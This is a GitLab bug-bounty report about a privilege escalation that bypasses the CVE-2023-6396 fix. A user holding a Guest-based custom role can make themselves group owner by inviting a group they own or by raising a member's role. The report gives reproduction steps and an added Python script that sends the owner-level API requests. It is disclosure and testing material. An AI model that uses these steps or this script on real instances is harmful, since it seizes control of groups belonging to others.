User with "admin_group_members" can still invite other groups to gain owner access (CVE-2023-6396 bypass)
HackerOne report #2270898 by joaxcar
on 2023-12-03, assigned to @rshambhuni:
Report
Summary
GitLab 16.6.1 shipped a fix so that users with the custom role permission "admin_group_member" can no longer invite users at a higher role than the custom role's base role. This restriction is now in place, but in groups that allow users to request access (public or internal groups) a user with this custom role can still take ownership of the group by inviting a group instead of inviting a "member".
An attack would look like this:
- A user gets assigned a custom role based on Guest that allows for admin_group_member
- The user creates another group where it will become owner
- Then the attacker invites this new group at "max membership role" as owner
- The attacker will now be owner of the target group
Steps to reproduce
Preconditions:
1. Start a new Ultimate trial on Gitlab.com
2. Create two users: victim_user, attacker_user
3. Create a private group private_ultimate_group as victim_user
4. Go to https://gitlab.com/groups/GROUPNAME/-/settings/roles_and_permissions
5. Create a custom role with admin_group_member checked, based on guest. Call it "guest manager"
6. Go to https://gitlab.com/groups/GROUPNAME/-/group_members and invite attacker_user as "guest manager"
The attack:
7. Log in as attacker_user
8. Create a new group called attacker_group
9. Go to https://gitlab.com/groups/private_ultimate_group/-/group_members
Scenario 1
- Click "Invite group"
- Search for attacker_group and select it. Also select "Role" as owner
- Click invite
- Refresh the page and the attacker should now be owner of the group with full owner access
Scenario 2
- Find an existing group member (it can be the attacker's second account, added as guest)
- Change it to any role higher than guest, e.g. owner
- Refresh the page and the existing member should now be owner of the group with full owner access
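The two scenarios above both come down to one REST call that the UI makes on the attacker's behalf: Scenario 1 is `POST /groups/:id/share` (the "Invite group" dialog) and Scenario 2 is `PUT /groups/:id/members/:user_id` (the role dropdown). The script below is an added regression check, not part of the report or of GitLab's own code; it assumes a GitLab instance URL, a personal access token for the attacker_user account that holds the Guest-based custom role, the target group path and the numeric id of a group the attacker owns (all placeholders). It builds the same requests the browser sends at the "owner" access level and classifies the reply: a success reply while the requested role is above the custom role's base role is the bypass.

```python
# Added example (not from the report): regression check for the
# admin_group_member group-invite bypass. All instance URLs, tokens and
# ids below are placeholders supplied by the caller.
import urllib.error
import urllib.parse
import urllib.request

# Access levels as used by the GitLab REST API
ACCESS_LEVELS = {"guest": 10, "reporter": 20, "developer": 30,
                 "maintainer": 40, "owner": 50}


def _group_api(base_url, group_path):
    # Group paths (including "parent/sub") must be URL-encoded as one path segment
    return f"{base_url}/api/v4/groups/{urllib.parse.quote(group_path, safe='')}"


def share_group_request(base_url, target_group, attacker_group_id, role, token):
    """Scenario 1: POST /groups/:id/share, the call behind 'Invite group'."""
    body = urllib.parse.urlencode({"group_id": attacker_group_id,
                                   "group_access": ACCESS_LEVELS[role]}).encode()
    return urllib.request.Request(f"{_group_api(base_url, target_group)}/share",
                                  data=body, method="POST",
                                  headers={"PRIVATE-TOKEN": token})


def change_member_request(base_url, target_group, member_user_id, role, token):
    """Scenario 2: PUT /groups/:id/members/:user_id, the call behind the role dropdown."""
    body = urllib.parse.urlencode({"access_level": ACCESS_LEVELS[role]}).encode()
    return urllib.request.Request(
        f"{_group_api(base_url, target_group)}/members/{member_user_id}",
        data=body, method="PUT", headers={"PRIVATE-TOKEN": token})


def classify(status, success_status, actor_base_role, requested_role):
    """Interpret an HTTP status from one of the requests above.

    "vulnerable": the server accepted a role above the custom role's base role
    "allowed":    accepted, but the role is at or below the base role (fine)
    "refused":    any non-success reply, i.e. the restriction held
    """
    if status != success_status:
        return "refused"
    if ACCESS_LEVELS[requested_role] > ACCESS_LEVELS[actor_base_role]:
        return "vulnerable"
    return "allowed"


def send(req):
    """Perform the request and return the HTTP status, keeping error statuses."""
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def run_share_check(base_url, target_group, attacker_group_id, token,
                    actor_base_role="guest"):
    """Scenario 1 end to end: share the target group with the attacker's group as owner."""
    req = share_group_request(base_url, target_group, attacker_group_id, "owner", token)
    return classify(send(req), 201, actor_base_role, "owner")


def run_member_check(base_url, target_group, member_user_id, token,
                     actor_base_role="guest"):
    """Scenario 2 end to end: raise an existing guest member to owner."""
    req = change_member_request(base_url, target_group, member_user_id, "owner", token)
    return classify(send(req), 200, actor_base_role, "owner")


if __name__ == "__main__":
    # Placeholder values: replace with the real instance, attacker PAT and ids.
    print(run_share_check("https://gitlab.example.com", "private_ultimate_group",
                          12345, "glpat-REPLACE_ME"))
```

Run it as attacker_user against a group where that account holds only the "guest manager" role; a result of "vulnerable" on either check means the custom role can still hand out owner access, while "refused" means the server rejected the higher access level. Note that a share created by a vulnerable instance is a real group link and must be removed afterwards.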
Impact
Privilege escalation from low custom role to group owner
What is the current bug behavior?
Custom role users can invite groups at a higher role level than their own
What is the expected correct behavior?
Custom roles should only be allowed to invite groups at most at their own level
Output of checks
This bug happens on GitLab.com